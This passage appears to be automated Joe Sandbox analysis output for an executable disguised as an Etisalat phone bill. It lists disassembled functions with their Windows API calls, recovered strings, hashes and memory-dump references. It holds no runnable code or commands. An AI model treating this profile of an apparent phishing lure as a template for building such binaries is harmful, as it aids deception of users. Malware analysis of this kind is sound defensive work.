                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: e5f53e93936ca3c83311960de4f9e6c9d2cdf39948b10cd9ea8ae7ba08e569dc
                                      • Instruction ID: 622691b0f6cd755b73f4578b47d23b116bd65d69cd8906143a9f70433e9f4e94
                                      • Opcode Fuzzy Hash: e5f53e93936ca3c83311960de4f9e6c9d2cdf39948b10cd9ea8ae7ba08e569dc
                                      • Instruction Fuzzy Hash: 74016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411BA15C4B941C7F5A864CBE5
                                      Function 00BC568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BC569B
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BC56B1
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00BC56C0
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BC56CF
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BC56D9
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BC56E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: cc43d786ad75eb0898b79e43dfe6f00fd9e8c90ba5f1cf4c77a7d1e67ef38806
                                      • Instruction ID: 6372946d12c3d986cc1aa850e6c122c35aea059c5bbd91db17e51b3f52a7ec2d
                                      • Opcode Fuzzy Hash: cc43d786ad75eb0898b79e43dfe6f00fd9e8c90ba5f1cf4c77a7d1e67ef38806
                                      • Instruction Fuzzy Hash: 68F01D3224119ABFE7215BA29C4DEBB7B7CEBC6B11F000169FA04D60909AA15A01C6B5
                                      Function 00BC74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 00BC74E5
                                      • EnterCriticalSection.KERNEL32(?,?,00B71044,?,?), ref: 00BC74F6
                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00B71044,?,?), ref: 00BC7503
                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00B71044,?,?), ref: 00BC7510
                                        • Part of subcall function 00BC6ED7: CloseHandle.KERNEL32(00000000,?,00BC751D,?,00B71044,?,?), ref: 00BC6EE1
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BC7523
                                      • LeaveCriticalSection.KERNEL32(?,?,00B71044,?,?), ref: 00BC752A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: ece0abc9d5076527f5e017c69ebb17c5be8e62e60c8cc18f63aa15a3b0060cf2
                                      • Instruction ID: 4e73b27feea59ca946f43f6f502f8c5077a5d69b47852c0a1cfff35707345568
                                      • Opcode Fuzzy Hash: ece0abc9d5076527f5e017c69ebb17c5be8e62e60c8cc18f63aa15a3b0060cf2
                                      • Instruction Fuzzy Hash: C3F03A7A540653ABDB111B64EC88EEA776AEF45302B010676F202AA0A0CF755901CE50
                                      Function 00BB8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BB8E7F
                                      • UnloadUserProfile.USERENV(?,?), ref: 00BB8E8B
                                      • CloseHandle.KERNEL32(?), ref: 00BB8E94
                                      • CloseHandle.KERNEL32(?), ref: 00BB8E9C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00BB8EA5
                                      • HeapFree.KERNEL32(00000000), ref: 00BB8EAC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      • Opcode ID: 5eaf8d75dc6ab09933cae5eff90e8343fe9d2540d494cc3a80425b7c4365ecb2
                                      • Instruction ID: f6fd12ffc186eaa15f6b8c2027e0b52fd0ad2bce3a2ff5b253f6161f32ce6770
                                      • Opcode Fuzzy Hash: 5eaf8d75dc6ab09933cae5eff90e8343fe9d2540d494cc3a80425b7c4365ecb2
                                      • Instruction Fuzzy Hash: 17E0C236004046FBDA011FE1EC4C92ABB69FB89322B108230F2299A0B0CF329460DB51
                                      Function 00BD8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00BD8928
                                      • CharUpperBuffW.USER32(?,?), ref: 00BD8A37
                                      • VariantClear.OLEAUT32(?), ref: 00BD8BAF
                                        • Part of subcall function 00BC7804: VariantInit.OLEAUT32(00000000), ref: 00BC7844
                                        • Part of subcall function 00BC7804: VariantCopy.OLEAUT32(00000000,?), ref: 00BC784D
                                        • Part of subcall function 00BC7804: VariantClear.OLEAUT32(00000000), ref: 00BC7859
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4237274167-1221869570
                                      • Opcode ID: bfdeae472d2fa0ccc98701d834536a5d9a83070c6dab9b500ca13f02152a365f
                                      • Instruction ID: 7ae30c02de839d82717979760378b92252d3c1b4d9d502ef4beb182d45bb2213
                                      • Opcode Fuzzy Hash: bfdeae472d2fa0ccc98701d834536a5d9a83070c6dab9b500ca13f02152a365f
                                      • Instruction Fuzzy Hash: 97917E716083019FC710EF24C48496AFBF4EF89715F0489AEF89A8B361EB31E945CB52
                                      Function 00BC2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B7FEC6: _wcscpy.LIBCMT ref: 00B7FEE9
                                      • _memset.LIBCMT ref: 00BC3077
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BC30A6
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BC3159
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BC3187
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                      • String ID: 0
                                      • API String ID: 4152858687-4108050209
                                      • Opcode ID: 154be3dea8e8555cbbda46bf710876d613a7a6c12e40fb89a3b1717e2bb63e70
                                      • Instruction ID: 6738cf3574e17069b120661b21f2f2b835a9da7b74c29883e35409afc5c2fa44
                                      • Opcode Fuzzy Hash: 154be3dea8e8555cbbda46bf710876d613a7a6c12e40fb89a3b1717e2bb63e70
                                      • Instruction Fuzzy Hash: 1351E0716083019FD725AF28D885F6BB7E4EF44B20F4889ADF895E31A0DB70CA44C792
                                      Function 00BBDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BBDAC5
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BBDAFB
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BBDB0C
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BBDB8E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      • Opcode ID: 5886a6607bce397c1d76e292265cb7ac2d3c974f64e314c591eab16a5988c499
                                      • Instruction ID: ddc3af1bab9d8fe104e3585adcd18c1bd285709edd6139fbdb5d5bf5b6b401ff
                                      • Opcode Fuzzy Hash: 5886a6607bce397c1d76e292265cb7ac2d3c974f64e314c591eab16a5988c499
                                      • Instruction Fuzzy Hash: 4A4151B1600609EFDB15CF54C884AEA7BE9EF48350F1580EDAD099F205E7F9D944DBA0
                                      Function 00BC2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BC2CAF
                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00BC2CCB
                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00BC2D11
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C26890,00000000), ref: 00BC2D5A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem_memset
                                      • String ID: 0
                                      • API String ID: 1173514356-4108050209
                                      • Opcode ID: 572fd957bbf2cb74aac8a8553cbfac1b6bdf32f5b204266db4188fd28f22c00d
                                      • Instruction ID: 0c314eafb6410cddaa61eb0154db76af2615b963bc1820bb449b13b15b08c36b
                                      • Opcode Fuzzy Hash: 572fd957bbf2cb74aac8a8553cbfac1b6bdf32f5b204266db4188fd28f22c00d
                                      • Instruction Fuzzy Hash: 5E4193702043429FD724DF28C885F6BB7E8EF95320F1446ADF96697291DB70E905CBA2
                                      Function 00BDDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BDDAD9
                                        • Part of subcall function 00B679AB: _memmove.LIBCMT ref: 00B679F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharLower_memmove
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 3425801089-567219261
                                      • Opcode ID: bf5e4badff82a78990a6c72a5b359a98f1e3a619066897df2e0f606cef2348c7
                                      • Instruction ID: c78bfd99ab281706c640730e82cc162a3a160869a94c5cab0fb754149e887d0f
                                      • Opcode Fuzzy Hash: bf5e4badff82a78990a6c72a5b359a98f1e3a619066897df2e0f606cef2348c7
                                      • Instruction Fuzzy Hash: 7E31527160061AAFCF10EF54C8919EEF7F5FF05314B1086AAE8A597791DB71A905CB80
                                      Function 00BB9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00BB93F6
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00BB9409
                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00BB9439
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$_memmove$ClassName
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 365058703-1403004172
                                      • Opcode ID: 0ec39dc21e9cb5a2b70e105d16494d51d1bc93b580d3a2cdf37a30c1ec8c9ab8
                                      • Instruction ID: 887a69c8a1d452492de824f170c4deb28698bb7975a138475dbd7baa57996915
                                      • Opcode Fuzzy Hash: 0ec39dc21e9cb5a2b70e105d16494d51d1bc93b580d3a2cdf37a30c1ec8c9ab8
                                      • Instruction Fuzzy Hash: 8521E471940104BFDB24ABB4CC85CFFB7E8DF05350B1042A9FA25972E1DFB94A0A9620
                                      Function 00BD1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BD1B40
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD1B66
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BD1B96
                                      • InternetCloseHandle.WININET(00000000), ref: 00BD1BDD
                                        • Part of subcall function 00BD2777: GetLastError.KERNEL32(?,?,00BD1B0B,00000000,00000000,00000001), ref: 00BD278C
                                        • Part of subcall function 00BD2777: SetEvent.KERNEL32(?,?,00BD1B0B,00000000,00000000,00000001), ref: 00BD27A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3113390036-3916222277
                                      • Opcode ID: d5823d5ef1212ae7277d6d21645cd589b0e8350e472862b6481416dd1128618a
                                      • Instruction ID: 1cad1aa046f0f84eaf2e4c1930b5759d7f63c9166d440ef33fefb0e460b01579
                                      • Opcode Fuzzy Hash: d5823d5ef1212ae7277d6d21645cd589b0e8350e472862b6481416dd1128618a
                                      • Instruction Fuzzy Hash: 32219FB5600208BFEB219F689CC5EBFB6EDEB89B44F1045ABF505A7340FA309D059761
                                      Function 00BE6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B61D73
                                        • Part of subcall function 00B61D35: GetStockObject.GDI32(00000011), ref: 00B61D87
                                        • Part of subcall function 00B61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B61D91
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BE66D0
                                      • LoadLibraryW.KERNEL32(?), ref: 00BE66D7
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BE66EC
                                      • DestroyWindow.USER32(?), ref: 00BE66F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                      • String ID: SysAnimate32
                                      • API String ID: 4146253029-1011021900
                                      • Opcode ID: 9a15b692c189e036768ac5421e21410b4082a3abe0e2f44be4a5bd2e215b088c
                                      • Instruction ID: 9649418b26e146585cc5d68c9113d10586557b42bbb10b6d6ba37ab85898b832
                                      • Opcode Fuzzy Hash: 9a15b692c189e036768ac5421e21410b4082a3abe0e2f44be4a5bd2e215b088c
                                      • Instruction Fuzzy Hash: EC21BB71210286AFEF104F66EC80EBB37EDEB693A8F100669F91196190C771CC41A760
                                      Function 00BC703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00BC705E
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BC7091
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00BC70A3
                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00BC70DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 9cb8bdc16d57321d8a846e90e4c5c023447d731580eeafc252ed94f25a6cbf1d
                                      • Instruction ID: 55a45d4840a2bd151dabaf9caba301b020bc06baa8b5d84f3f19b577cec96e7e
                                      • Opcode Fuzzy Hash: 9cb8bdc16d57321d8a846e90e4c5c023447d731580eeafc252ed94f25a6cbf1d
                                      • Instruction Fuzzy Hash: 65214F7454420AABDB209F69D845F9A77E8EF44720F20465DFDA1D72D0DF7098508F51
                                      Function 00BC710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00BC712B
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BC715D
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00BC716E
                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00BC71A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 5a8f433da5bba63154a3f0df53b458f96846e363a4d54c53463bb2ca86088531
                                      • Instruction ID: 56406a8ed81f78e8e9f3bac80dddd3b2fc4780381d564265d37fc3c39456f3b6
                                      • Opcode Fuzzy Hash: 5a8f433da5bba63154a3f0df53b458f96846e363a4d54c53463bb2ca86088531
                                      • Instruction Fuzzy Hash: A021A17554420A9BDB209F689C44FAAB7E8EF55720F24069DFDB0E72D0DF7098418F61
                                      Function 00BCAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00BCAEBF
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BCAF13
                                      • __swprintf.LIBCMT ref: 00BCAF2C
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00BEF910), ref: 00BCAF6A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu
                                      • API String ID: 3164766367-685833217
                                      • Opcode ID: dfecb6459543d7830a3056005005317f391a66b0b8861e0d6d14b692e9c1971f
                                      • Instruction ID: 52e70129603f5cf460c6f704f6f92806008b5f32ae4d52cc4c741aa8149553d8
